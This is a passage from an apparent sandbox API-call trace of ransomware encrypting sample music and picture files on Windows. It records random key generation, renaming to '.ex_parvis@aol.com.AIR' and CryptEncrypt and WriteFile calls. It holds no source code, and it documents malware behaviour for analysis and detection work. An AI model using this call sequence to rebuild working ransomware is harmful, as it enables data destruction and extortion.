lpOverlapped=0x0) returned 1 [0168.027] WriteFile (in: hFile=0x5d4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0168.027] ReadFile (in: hFile=0x5d4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x49e459, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x49e459, lpOverlapped=0x0) returned 1 [0168.396] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0168.396] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0168.396] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", dwFileAttributes=0x80) returned 1 [0168.399] lstrlenW (lpString="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 65 [0168.399] GetProcessHeap () returned 0x2e0000 [0168.399] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe8) returned 0x3ac428 [0168.399] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" | out: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" [0168.399] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0168.399] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0168.403] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4 [0168.403] GetProcessHeap () returned 0x2e0000 [0168.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0168.403] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4113874) returned 1 [0168.403] SetFilePointer (in: hFile=0x5d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x3ec5d2 [0168.403] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0168.403] GetProcessHeap () returned 0x2e0000 [0168.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0168.403] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0168.403] WriteFile (in: hFile=0x5d4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0168.405] WriteFile (in: hFile=0x5d4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0168.405] WriteFile (in: hFile=0x5d4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0168.406] ReadFile (in: hFile=0x5d4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x3ec5d2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x3ec5d2, lpOverlapped=0x0) returned 1 [0168.698] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0168.698] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0168.698] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", dwFileAttributes=0x80) returned 1 [0168.700] lstrlenW (lpString="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 47 [0168.700] GetProcessHeap () returned 0x2e0000 [0168.700] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc4) returned 0x319788 [0168.700] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" | out: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" [0168.700] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0168.700] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0168.702] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4 [0168.702] GetProcessHeap () returned 0x2e0000 [0168.702] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0168.702] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=8414449) returned 1 [0168.702] SetFilePointer (in: hFile=0x5d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x8064f1 [0168.702] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0168.702] GetProcessHeap () returned 0x2e0000 [0168.702] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0168.702] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0168.702] WriteFile (in: hFile=0x5d4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0168.704] WriteFile (in: hFile=0x5d4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0168.704] WriteFile (in: hFile=0x5d4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0168.712] ReadFile (in: hFile=0x5d4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x8064f1, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x8064f1, lpOverlapped=0x0) returned 1 [0169.415] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.415] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.415] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini", dwFileAttributes=0x80) returned 1 [0169.416] lstrlenW (lpString="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 47 [0169.416] GetProcessHeap () returned 0x2e0000 [0169.416] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc4) returned 0x319788 [0169.416] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini" [0169.416] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0169.416] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.420] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\Sample Music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4 [0169.420] GetProcessHeap () returned 0x2e0000 [0169.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0169.420] GetFileSizeEx (in: hFile=0x5d4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=586) returned 1 [0169.420] SetFilePointer (in: hFile=0x5d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x24a [0169.420] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.420] GetProcessHeap () returned 0x2e0000 [0169.420] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.420] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.420] WriteFile (in: hFile=0x5d4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.422] WriteFile (in: hFile=0x5d4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.422] WriteFile (in: hFile=0x5d4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.422] ReadFile (in: hFile=0x5d4, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x24a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x24a, lpOverlapped=0x0) returned 1 [0169.422] SetFilePointer (in: hFile=0x5d4, lDistanceToMove=-586, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.422] WriteFile (in: hFile=0x5d4, lpBuffer=0x31d0438*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0438*, lpNumberOfBytesWritten=0x2acf9c8*=0x24a, lpOverlapped=0x0) returned 1 [0169.422] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb1b9aaf0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1b9aaf0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b21a8 [0169.423] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.423] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.423] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", dwFileAttributes=0x80) returned 1 [0169.423] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 52 [0169.423] GetProcessHeap () returned 0x2e0000 [0169.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xce) returned 0x3470a0 [0169.423] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" [0169.423] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0169.423] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.425] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.425] GetProcessHeap () returned 0x2e0000 [0169.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0169.425] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=620888) returned 1 [0169.425] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x97958 [0169.425] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.425] GetProcessHeap () returned 0x2e0000 [0169.426] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.426] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.426] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.429] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.429] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.430] ReadFile (in: hFile=0x5d8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x97958, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x97958, lpOverlapped=0x0) returned 1 [0169.468] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.468] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.469] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", dwFileAttributes=0x80) returned 1 [0169.470] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned 54 [0169.470] GetProcessHeap () returned 0x2e0000 [0169.470] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd2) returned 0x319788 [0169.470] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" [0169.470] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0169.470] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.472] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.472] GetProcessHeap () returned 0x2e0000 [0169.472] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0169.472] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=777835) returned 1 [0169.472] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xbde6b [0169.472] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.472] GetProcessHeap () returned 0x2e0000 [0169.472] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.472] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0169.472] WriteFile (in: hFile=0x5d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0169.475] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0169.475] WriteFile (in: hFile=0x5d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0169.476] ReadFile (in: hFile=0x5d8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xbde6b, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xbde6b, lpOverlapped=0x0) returned 1 [0169.521] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0169.521] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0169.521] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", dwFileAttributes=0x80) returned 1 [0169.521] lstrlenW (lpString="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 56 [0169.521] GetProcessHeap () returned 0x2e0000 [0169.521] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd6) returned 0x319788 [0169.521] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" [0169.521] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0169.521] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0169.524] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0169.524] GetProcessHeap () returned 0x2e0000 [0169.524] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0169.524] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=561276) returned 1 [0169.524] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x8907c [0169.524] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0169.524] GetProcessHeap () returned 0x2e0000 [0169.524] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0169.524] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) 